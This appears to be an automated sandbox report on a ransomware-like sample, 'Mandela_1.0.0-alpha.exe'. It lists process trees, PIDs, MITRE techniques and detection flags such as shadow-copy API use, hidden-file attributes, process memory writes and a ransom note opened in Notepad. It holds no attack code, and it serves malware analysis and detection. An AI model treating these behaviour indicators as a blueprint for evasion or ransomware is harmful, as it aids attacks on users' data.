Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings	MicrosoftEdgeCP.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1204 reg.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

2696 NOTEPAD.EXE

pid	process
1204	reg.exe

pid	process
2696	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

Processes:

chrome.exechrome.exechrome.exechrome.exetaskhsvc.exemspaint.exe

pid	process
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
5028	chrome.exe
5028	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3256	chrome.exe
3256	chrome.exe
3452	taskhsvc.exe
3452	taskhsvc.exe
3452	taskhsvc.exe
3452	taskhsvc.exe
3452	taskhsvc.exe
3452	taskhsvc.exe
2356	mspaint.exe
2356	mspaint.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

@[email protected]

pid process

2876 @[email protected]
Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

MicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

pid process

4220 MicrosoftEdgeCP.exe
4220 MicrosoftEdgeCP.exe
4220 MicrosoftEdgeCP.exe
4220 MicrosoftEdgeCP.exe
1588 MicrosoftEdgeCP.exe
1588 MicrosoftEdgeCP.exe

pid	process
2876	@[email protected]

pid	process
4220	MicrosoftEdgeCP.exe
4220	MicrosoftEdgeCP.exe
4220	MicrosoftEdgeCP.exe
4220	MicrosoftEdgeCP.exe
1588	MicrosoftEdgeCP.exe
1588	MicrosoftEdgeCP.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 21 IoCs

Processes:

chrome.exechrome.exe

pid	process
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

MicrosoftEdgeCP.exeMicrosoftEdge.exechrome.exe

description	pid	process
Token: SeDebugPrivilege	3868	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	3868	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	3868	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	3868	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4524	MicrosoftEdge.exe
Token: SeDebugPrivilege	4524	MicrosoftEdge.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe
Token: SeShutdownPrivilege	4536	chrome.exe
Token: SeCreatePagefilePrivilege	4536	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exe

pid	process
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe

Suspicious use of SendNotifyMessage 48 IoCs

Processes:

chrome.exechrome.exe

pid	process
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
4536	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe
3376	chrome.exe

Suspicious use of SetWindowsHookEx 58 IoCs

Processes:

pid	process
4524	MicrosoftEdge.exe
4220	MicrosoftEdgeCP.exe
3868	MicrosoftEdgeCP.exe
4220	MicrosoftEdgeCP.exe
1528	Mandela_1.0.0-alpha.exe
508	@[email protected]
508	@[email protected]
3256	@[email protected]
3256	@[email protected]
2876	@[email protected]
2876	@[email protected]
1400	@[email protected]
3556	@[email protected]
5000	@[email protected]
4572	@[email protected]
2944	@[email protected]
2928	MicrosoftEdge.exe
4260	@[email protected]
1588	MicrosoftEdgeCP.exe
1588	MicrosoftEdgeCP.exe
3564	@[email protected]
3344	@[email protected]
1892	@[email protected]
5048	@[email protected]
2356	mspaint.exe
2356	mspaint.exe
2356	mspaint.exe
2356	mspaint.exe
4208	@[email protected]
5024	@[email protected]
1596	@[email protected]
4748	@[email protected]
1968	@[email protected]
2804	@[email protected]
4292	@[email protected]
1864	@[email protected]
2196	@[email protected]
4956	@[email protected]
1452	@[email protected]
1912	@[email protected]
1376	@[email protected]
672	@[email protected]
1232	@[email protected]
596	@[email protected]
2972	@[email protected]
2632	@[email protected]
4004	@[email protected]
808	@[email protected]
1168	@[email protected]
4240	@[email protected]
4160	@[email protected]
1856	@[email protected]
1432	@[email protected]
3268	@[email protected]
3608	@[email protected]
1964	@[email protected]
2788	@[email protected]
4572	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

MicrosoftEdgeCP.exechrome.exe

description	pid	process	target process
PID 4220 wrote to memory of 2856	4220	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 4220 wrote to memory of 2856	4220	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 4220 wrote to memory of 2856	4220	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 4220 wrote to memory of 2856	4220	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 4220 wrote to memory of 2856	4220	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 4220 wrote to memory of 2856	4220	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 4220 wrote to memory of 2856	4220	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 4220 wrote to memory of 2856	4220	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 4220 wrote to memory of 2856	4220	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 4220 wrote to memory of 2856	4220	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 4536 wrote to memory of 1536	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 1536	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 4340	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 2576	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 2576	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 816	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 816	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 816	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 816	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 816	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 816	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 816	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 816	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 816	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 816	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 816	4536	chrome.exe	chrome.exe
PID 4536 wrote to memory of 816	4536	chrome.exe	chrome.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 3 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exe

pid process

1864 attrib.exe
3364 attrib.exe
3936 attrib.exe

pid	process
1864	attrib.exe
3364	attrib.exe
3936	attrib.exe

C:\Windows\system32\LaunchWinApp.exe
"C:\Windows\system32\LaunchWinApp.exe" "https://www.google.co.uk/?safe=active&ssui=on"
1⤵
PID:3336

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4524

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:1936

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4220

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3868

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:2856

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4536

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff99bdc9758,0x7ff99bdc9768,0x7ff99bdc9778
2⤵
PID:1536

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1544 --field-trial-handle=1756,i,10762962779984266337,4796431597687517741,131072 /prefetch:2
2⤵
PID:4340

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1756,i,10762962779984266337,4796431597687517741,131072 /prefetch:8
2⤵
PID:2576

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2104 --field-trial-handle=1756,i,10762962779984266337,4796431597687517741,131072 /prefetch:8
2⤵
PID:816

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2856 --field-trial-handle=1756,i,10762962779984266337,4796431597687517741,131072 /prefetch:1
2⤵
PID:4572

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2864 --field-trial-handle=1756,i,10762962779984266337,4796431597687517741,131072 /prefetch:1
2⤵
PID:4844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4488 --field-trial-handle=1756,i,10762962779984266337,4796431597687517741,131072 /prefetch:1
2⤵
PID:2800

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4600 --field-trial-handle=1756,i,10762962779984266337,4796431597687517741,131072 /prefetch:8
2⤵
PID:3564

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4700 --field-trial-handle=1756,i,10762962779984266337,4796431597687517741,131072 /prefetch:8
2⤵
PID:2944

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5040 --field-trial-handle=1756,i,10762962779984266337,4796431597687517741,131072 /prefetch:8
2⤵
PID:996

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5028 --field-trial-handle=1756,i,10762962779984266337,4796431597687517741,131072 /prefetch:8
2⤵
PID:4592

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5104 --field-trial-handle=1756,i,10762962779984266337,4796431597687517741,131072 /prefetch:1
2⤵
PID:3772

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5188 --field-trial-handle=1756,i,10762962779984266337,4796431597687517741,131072 /prefetch:1
2⤵
PID:3948

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 --field-trial-handle=1756,i,10762962779984266337,4796431597687517741,131072 /prefetch:8
2⤵
PID:2012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2856 --field-trial-handle=1756,i,10762962779984266337,4796431597687517741,131072 /prefetch:8
2⤵
PID:2072

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4664 --field-trial-handle=1756,i,10762962779984266337,4796431597687517741,131072 /prefetch:1
2⤵
PID:4200

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3916 --field-trial-handle=1756,i,10762962779984266337,4796431597687517741,131072 /prefetch:1
2⤵
PID:804

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 --field-trial-handle=1756,i,10762962779984266337,4796431597687517741,131072 /prefetch:8
2⤵
PID:3316

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5212 --field-trial-handle=1756,i,10762962779984266337,4796431597687517741,131072 /prefetch:1
2⤵
PID:2640

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 --field-trial-handle=1756,i,10762962779984266337,4796431597687517741,131072 /prefetch:8
2⤵
PID:3000

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5664 --field-trial-handle=1756,i,10762962779984266337,4796431597687517741,131072 /prefetch:8
2⤵
PID:4632

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5704 --field-trial-handle=1756,i,10762962779984266337,4796431597687517741,131072 /prefetch:8
2⤵
PID:3944

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5708 --field-trial-handle=1756,i,10762962779984266337,4796431597687517741,131072 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5028

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 --field-trial-handle=1756,i,10762962779984266337,4796431597687517741,131072 /prefetch:8
2⤵
PID:4972

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5740 --field-trial-handle=1756,i,10762962779984266337,4796431597687517741,131072 /prefetch:8
2⤵
PID:4120

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4604 --field-trial-handle=1756,i,10762962779984266337,4796431597687517741,131072 /prefetch:8
2⤵
PID:5080

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3780 --field-trial-handle=1756,i,10762962779984266337,4796431597687517741,131072 /prefetch:8
2⤵
PID:2292

C:\Users\Admin\Downloads\Mandela_1.0.0-alpha.exe
"C:\Users\Admin\Downloads\Mandela_1.0.0-alpha.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1528

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4360

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:3376

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff99bdc9758,0x7ff99bdc9768,0x7ff99bdc9778
2⤵
PID:3392

C:\Program Files\Google\Chrome\Application\chrome.exe
